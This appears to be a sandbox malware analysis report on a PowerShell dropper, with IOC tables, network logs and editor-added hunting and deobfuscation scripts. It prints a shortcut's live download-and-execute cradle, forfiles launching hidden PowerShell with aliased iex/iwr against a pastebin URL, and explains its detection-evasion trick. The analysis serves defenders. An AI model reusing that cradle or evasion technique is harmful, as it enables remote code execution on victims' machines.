                                                          • Number of non-executed functions: 8
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 2944 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 5180 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • VT rate limit hit for: cr_asm_atCAD.ps1
| Time | Type | Description |
|---|---|---|
| 11:58:00 | API Interceptor | 297x Sleep call for process: powershell.exe modified |
| 17:58:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" |
| 17:58:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" |
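The two Autostart entries above are the host artefact a responder should hunt for: a Run value named after a legitimate product ("OneDrive File Sync") whose command is not an executable but a shortcut under ProgramData, which in turn hands off to a script host. The script below is an added hunting example by the editor, not part of the Joe Sandbox report or of the sample. It enumerates the common Run/RunOnce keys, resolves any .lnk command through the WScript.Shell COM object and reports shortcuts that launch an interpreter, sit under ProgramData or carry the hidden attribute (the report shows attrib.exe as a child of the dropper, so the hidden check is an assumption about what it was used for). The key list, the interpreter list and the ProgramData heuristic are the editor's choices, not values taken from the report; run it on the suspect host with read access to HKCU and HKLM.

```powershell
# Added hunting script (not from the report or the sample): find Run/RunOnce values
# that launch a shortcut, resolve the shortcut and flag script-host launchers.

# Assumed key list: the usual per-user and per-machine autostart locations.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Interpreters a shortcut-based autostart typically hands off to (editor's list).
$scriptHosts = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'forfiles.exe')

$shell = New-Object -ComObject WScript.Shell

function Get-AutorunPath {
    # Return the launched path from a Run value, dropping surrounding quotes and arguments.
    param([string]$Command)
    $c = $Command.Trim()
    if ($c.StartsWith('"')) {
        $end = $c.IndexOf('"', 1)
        if ($end -gt 0) { return $c.Substring(1, $end - 1) }
    }
    return ($c -split '\s+', 2)[0]
}

function Find-ShortcutAutoruns {
    $results = foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata, not autorun values
            $path = Get-AutorunPath -Command ([string]$p.Value)
            $reasons = @()
            if ($path -match '\.lnk$') {
                $reasons += 'launches a shortcut'
                if (Test-Path -LiteralPath $path) {
                    $lnk = $shell.CreateShortcut($path)
                    if ($lnk.TargetPath) {
                        $leaf = (Split-Path -Leaf $lnk.TargetPath).ToLower()
                        if ($scriptHosts -contains $leaf) {
                            $reasons += "shortcut runs $leaf $($lnk.Arguments)"
                        }
                    }
                    # -Force is needed so Get-Item returns hidden/system files at all.
                    $attr = (Get-Item -LiteralPath $path -Force).Attributes
                    if ($attr -band [IO.FileAttributes]::Hidden) { $reasons += 'shortcut is hidden' }
                } else {
                    $reasons += 'shortcut file missing'
                }
            }
            if ($path -like "$env:ProgramData\*") { $reasons += 'launched from ProgramData' }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Key     = $key
                    Name    = $p.Name
                    Command = $p.Value
                    Reasons = ($reasons -join '; ')
                }
            }
        }
    }
    @($results)
}

Find-ShortcutAutoruns | Format-List
```

Resolving the shortcut matters because the Run value itself looks benign: the registry only records the .lnk path, and the interpreter plus its command line live inside the shortcut's TargetPath and Arguments. A value that launches a .lnk at all is unusual enough to review, so the script reports it even when the target cannot be resolved.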
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 104.20.3.235 | vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2 |
| | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2 |
| | 5UIy3bo46y.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2 |
| | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2 |
| | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv |
| | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | pastebin.com/raw/V9y5Q5vv |
| | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv |
| | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr |
| | Invoice-883973938.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr |
| 162.159.136.232 | S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | discord.com/administrator/index.php |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| discord.com | vF20HtY4a4.exe | malicious | Unknown | 162.159.136.232 |
| | vF20HtY4a4.exe | malicious | Unknown | 162.159.136.232 |
| | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 162.159.138.232 |
| | OSLdZanXNc.exe | malicious | Unknown | 162.159.137.232 |
| | 5UIy3bo46y.dll | malicious | Unknown | 162.159.128.233 |
| | HQsitBLlOv.dll | malicious | Unknown | 162.159.136.232 |
| | xK44OOt7vD.exe | malicious | Unknown | 162.159.138.232 |
| | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232 |
| | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232 |
| raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133 |
| | 65567 DHL 647764656798860.xlam.xlsx | malicious | AgentTesla | 185.199.109.133 |
| | Request for Order Confirmation.js | malicious | Unknown | 185.199.110.133 |
| | RrEf8Rui72.exe | malicious | Unknown | 185.199.109.133 |
| | Untitled_15-10-04.xls | malicious | Remcos | 185.199.108.133 |
| | Image_Attachments.xls | malicious | Remcos | 185.199.109.133 |
| | vF20HtY4a4.exe | malicious | Unknown | 185.199.108.133 |
| | vF20HtY4a4.exe | malicious | Unknown | 185.199.110.133 |
| | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 185.199.108.133 |
| | OSLdZanXNc.exe | malicious | Unknown | 185.199.108.133 |
| pastebin.com | vF20HtY4a4.exe | malicious | Unknown | 104.20.3.235 |
| | vF20HtY4a4.exe | malicious | Unknown | 104.20.4.235 |
| | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 172.67.19.24 |
| | OSLdZanXNc.exe | malicious | Unknown | 104.20.3.235 |
| | 5UIy3bo46y.dll | malicious | Unknown | 104.20.3.235 |
| | HQsitBLlOv.dll | malicious | Unknown | 104.20.4.235 |
| | xK44OOt7vD.exe | malicious | Unknown | 172.67.19.24 |
| | steamcodegenerator.exe | malicious | Unknown | 172.67.19.24 |
| | Lm9IJ4r9oO.exe | malicious | Unknown | 104.20.3.235 |
| | gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24 |
Match: CLOUDFLARENET (US)
Associated Sample Name / URL | Detection | Threat Name | Context
cyCsE47YV3.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
na.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
RemotePCViewer.exe | malicious | Unknown | 172.67.37.123
https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvw | malicious | Unknown | 188.114.96.3
Play_New_001min 11sec _ ATT20283(David.dekraker).html | malicious | HTMLPhisher | 104.17.25.14
http://bryrs.harvis.cloud/4OtSUE17531Obzq1449ntesnrecvv32137XDTBTTHBDZFIWJU1475FZMF19147t17 | malicious | Phisher | 188.114.97.3
original (6).eml | malicious | Unknown | 104.17.25.14
Hesap-hareketleriniz10-15-2024.exe | malicious | FormBook | 188.114.97.3
Comprovativo_Outubro_oddigsvl_09-10-2024_53.vbs.zip | malicious | Unknown | 1.1.1.1
Request for Order Confirmation.js | malicious | Unknown | 162.159.140.237
Match: FASTLY (US)
Associated Sample Name / URL | Detection | Threat Name | Context
na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
Request For Quotation.js | malicious | STRRAT | 199.232.196.209
Request For Quotation.js | malicious | STRRAT | 199.232.192.209
Request For Quotation.js | malicious | STRRAT | 199.232.196.209
65567 DHL 647764656798860.xlam.xlsx | malicious | AgentTesla | 185.199.109.133
Request for Order Confirmation.js | malicious | Unknown | 185.199.110.133
proof of payment.js | malicious | STRRAT | 199.232.196.209
RrEf8Rui72.exe | malicious | Unknown | 185.199.109.133
Untitled_15-10-04.xls | malicious | Remcos | 185.199.108.133
Image_Attachments.xls | malicious | Remcos | 185.199.108.133
Match: 3b5074b1b5d032e5620f69f9f700ff0e (JA3 client fingerprint)
Associated Sample Name / URL | Detection | Threat Name | Context
na.hta | malicious | Cobalt Strike, Remcos | 104.20.3.235, 162.159.136.232, 185.199.110.133
cyCsE47YV3.exe | malicious | Snake Keylogger, VIP Keylogger | 104.20.3.235, 162.159.136.232, 185.199.110.133
z7NLXIia8r.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.136.232, 185.199.110.133
wbxZk3AvuB.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.136.232, 185.199.110.133
3ckUhKW8W6.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.136.232, 185.199.110.133
Iw6bIFfJSu.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.136.232, 185.199.110.133
GdVSN8ISU4.exe | malicious | ScreenConnect Tool | 104.20.3.235, 162.159.136.232, 185.199.110.133
                                                          No context
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):4.527272298423835
                                                          Encrypted:false
                                                          SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                          MD5:724AA21828AD912CB466E3B0A79F478B
                                                          SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                          SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                          SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                          Malicious:true
                                                          Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
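The Preview above is the shortcut's UTF-16LE argument string with every NUL byte shown as a dot. Read as text, the link's target is C:\Windows\System32\forfiles.exe with the arguments /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'". forfiles runs the /c command once for the file that matches notepad.exe, so the shortcut never launches powershell.exe directly (this is the "Powershell creates an autostart link" signature: a Startup-folder LNK proxied through a LOLBin). Inside, sal is Set-Alias: callit becomes an alias for Invoke-Expression, and because the alias name is taken from $env:os, the token WINDOWS_NT becomes an alias for Invoke-WebRequest. The last statement is therefore iex(iwr pastebin.com/raw/sA04Mwk2), a plain download cradle whose cmdlet names never appear in the command line. The script below is an added triage helper written for this page; it is not part of the Joe Sandbox report or of the sample. It assumes the stock Windows PowerShell alias table (iex and iwr) and that $env:os expands to Windows_NT, and its input is the argument string reconstructed from the preview, labelled as constructed.

```python
import re

# Constructed input: the argument string from the LNK Preview above, rendered as plain
# text (the sandbox preview shows it as UTF-16LE with a dot for every NUL byte).
LNK_ARGS = (
    '/p c:\\windows\\system32 /m notepad.exe /c "powershell.exe -command powershell '
    "-windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; "
    "calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'\""
)

# Assumption: stock Windows PowerShell 5.1 alias table; only the two the cradle needs.
BUILTIN_ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}

# Assumption: the value of $env:os on any NT-based Windows host.
DEFAULT_ENV = {"os": "Windows_NT"}


def forfiles_payload(args):
    """Return the command forfiles.exe runs for each matched file (its /c "..." argument)."""
    m = re.search(r'/c\s+"(.*)"\s*$', args, re.S)
    return m.group(1) if m else None


def innermost_command(ps_cmdline):
    """Peel nested  powershell ... -command '<body>'  wrappers and return the last body."""
    body = ps_cmdline
    while True:
        m = re.search(r"-command\s+'(.*)'\s*$", body, re.S | re.I)
        if not m:
            return body.strip()
        body = m.group(1)


def resolve_aliases(body, env=None):
    """Undo sal/Set-Alias indirection: drop the alias definitions and rewrite every use
    of an alias (including one whose name came from an environment variable) to the
    canonical cmdlet. Returns (rewritten_script, alias_table)."""
    env = env or DEFAULT_ENV
    aliases = dict(BUILTIN_ALIASES)
    kept = []
    for stmt in (s.strip() for s in body.split(";")):
        m = re.match(r"(?:sal|set-alias)\s+(\S+)\s+(\S+)$", stmt, re.I)
        if m:
            name, target = m.groups()
            if name.lower().startswith("$env:"):          # e.g. sal $env:os iWr
                name = env.get(name[5:].lower(), name)
            # chase one level so an alias of an alias still lands on the cmdlet
            aliases[name.lower()] = aliases.get(target.lower(), target)
        elif stmt:
            kept.append(stmt)
    # PowerShell command names are case-insensitive, so match tokens ignoring case
    token = re.compile(r"\b(" + "|".join(map(re.escape, aliases)) + r")\b", re.I)
    rewritten = "; ".join(token.sub(lambda m: aliases[m.group(1).lower()], s) for s in kept)
    return rewritten, aliases


def triage(lnk_args):
    """Summarise what the shortcut does once every layer of indirection is removed."""
    payload = forfiles_payload(lnk_args) or lnk_args
    resolved, aliases = resolve_aliases(innermost_command(payload))
    return {
        "resolved": resolved,
        "aliases": aliases,
        "download_cradle": "Invoke-Expression" in resolved and "Invoke-WebRequest" in resolved,
        "urls": re.findall(r"\b[\w.-]+\.[a-z]{2,}/[^\s)'\"]+", resolved, re.I),
        "hidden_window": bool(re.search(r"-windowstyle\s+h\b", lnk_args, re.I)),
        "proxied_by_forfiles": forfiles_payload(lnk_args) is not None,
    }


if __name__ == "__main__":
    for key, value in triage(LNK_ARGS).items():
        print(f"{key}: {value}")
```

For this sample the resolved line is Invoke-Expression(Invoke-WebRequest pastebin.com/raw/sA04Mwk2 -usebasicparsing), which is what a detection for "iex of iwr output" expects to see but never would in the raw command line. Alias resolution before string matching, or a rule on Set-Alias/sal whose target is iex or iwr, closes that gap; the fatbake alias for calc is never used and exists only to make the alias block look benign.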
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.890472898059848
                                                          Encrypted:false
                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1940658735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllul5L:NllU5
                                                          MD5:9C944FDDA1A47DD1849803932ABE8B44
                                                          SHA1:E37C1C44EE1A5693B5B7221687567926DE613749
                                                          SHA-256:F5C2F1A4713AC3F802F02D0B658A300ABD41EB7455C87485043E0FB55B445770
                                                          SHA-512:EC259F45550DC51358C308BCA433FEBC33BFADD6C3C1DF0DC97F4A2DFF855F1D5E009C642E9FC7E5BB1934060CAE77306002ED8006CD943BBC5E594BAE778746
                                                          Malicious:false
                                                          Preview:@...e...............................[.. .............@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6222
                                                          Entropy (8bit):3.711147878346773
                                                          Encrypted:false
                                                          SSDEEP:96:3TuCgP8XokvhkvCCtX0cYQFhHttcYQ/hHtA:3TSPE0X0c3vtc9vA
                                                          MD5:62B1F54E7B39A13965C00F9EFFB68BD5
                                                          SHA1:F514D3B42800C819E4EBF0A2CCA069559FD45F85
                                                          SHA-256:3AA8EC8FE100B124CA3387F8EF2795DE012CBBD05A60D5E12810BA0EF4E2100F
                                                          SHA-512:8C1D3628E4C6E57727DE735C129C82CB8DF54390650114EE5146EB9CD63FD62E22EA15382753BA587C69A06B2A6697C3CC9268C86FCE311A26AAA8871485354A
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ......Yd..........z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...vu..................t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BOY<...........................d...A.p.p.D.a.t.a...B.V.1.....OY:...Roaming.@......EW)BOY:.........................../c..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BOY7............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BOY7.............................`.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BOY7.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BOY7.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BOY=......0..........
                                                          File type:ASCII text, with very long lines (4783)
                                                          Entropy (8bit):4.2982947222806835
                                                          TrID:
                                                            File name:cr_asm_atCAD.ps1
                                                            File size:6'678 bytes
                                                            MD5:7a4c9d478466dab6eabf75e7e0c2ffb4
                                                            SHA1:2156ef7e9cee3767d71d9f98921fe4aec7bb72de
                                                            SHA256:9652251a33ecf9ca8fd76b9168a5459fbdd696889f5c359b20e8e109a308d333
                                                            SHA512:213fde006e0a7282f3dd068ea6f73089f288e8f15391165d953dacec4b56c6974a5fce7901eb99c0f2030f9c737dfebbc7687593db449c5860e3abbe784f55b8
                                                            SSDEEP:96:TNM48ZNMcJ++KpFsB1UEb3CBqZz+E6tNMuUI+Udh2I6:xMFM4wpFshbwqUdMZc2H
                                                            TLSH:7ED15571475093F4E481C7C5C06D72AB52BAC7A730A83D26DBE21E8B6C1ADD770385B2
                                                            File Content Preview:$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk".if (-Not (Test-Path $googoogaagaa)) {..$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User").$newPath = $currentPath + ";$env:tmp".[System.Environment]::SetEn
                                                            Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T17:58:17.350944+0200 | 2857658 | ETPRO MALWARE Win32/Fake Robux Bot Registration | 1 | 192.168.2.8 | 49710 | 162.159.136.232 | 443 | TCP
2024-10-15T17:58:30.423322+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.8 | 49717 | 162.159.136.232 | 443 | TCP
2024-10-15T17:58:37.042189+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.8 | 49718 | 162.159.136.232 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 17:58:13.091157913 CEST | 49704 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:13.096030951 CEST | 80 | 49704 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:13.096177101 CEST | 49704 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:13.101649046 CEST | 49704 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:13.106477022 CEST | 80 | 49704 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:13.699625969 CEST | 80 | 49704 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:13.707364082 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:13.707422972 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:13.707484961 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:13.750786066 CEST | 49704 | 80 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:13.955657005 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:13.955674887 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:14.578373909 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:14.578459024 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:14.582849979 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:14.582865953 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:14.583123922 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:14.604675055 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:14.647411108 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:14.768764019 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:14.768856049 CEST | 443 | 49705 | 104.20.3.235 | 192.168.2.8
Oct 15, 2024 17:58:14.768990993 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:14.807323933 CEST | 49705 | 443 | 192.168.2.8 | 104.20.3.235
Oct 15, 2024 17:58:14.910372972 CEST | 49706 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:14.915206909 CEST | 80 | 49706 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:14.915291071 CEST | 49706 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:14.917721987 CEST | 49706 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:14.922800064 CEST | 80 | 49706 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:15.502379894 CEST | 80 | 49706 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:15.502671003 CEST | 49706 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:15.504554987 CEST | 80 | 49706 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:15.504606962 CEST | 49706 | 80 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:15.507626057 CEST | 80 | 49706 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:15.513242006 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:15.513281107 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:15.513344049 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:15.513746023 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:15.513760090 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:15.793323040 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:15.793371916 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:15.793450117 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:15.796430111 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:15.796441078 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:16.950344086 CEST | 443 | 49710 | 162.159.136.232 | 192.168.2.8
Oct 15, 2024 17:58:16.950408936 CEST | 49710 | 443 | 192.168.2.8 | 162.159.136.232
Oct 15, 2024 17:58:16.950655937 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:16.950726986 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:16.953361034 CEST | 49708 | 443 | 192.168.2.8 | 185.199.110.133
Oct 15, 2024 17:58:16.953368902 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
Oct 15, 2024 17:58:16.953680992 CEST | 443 | 49708 | 185.199.110.133 | 192.168.2.8
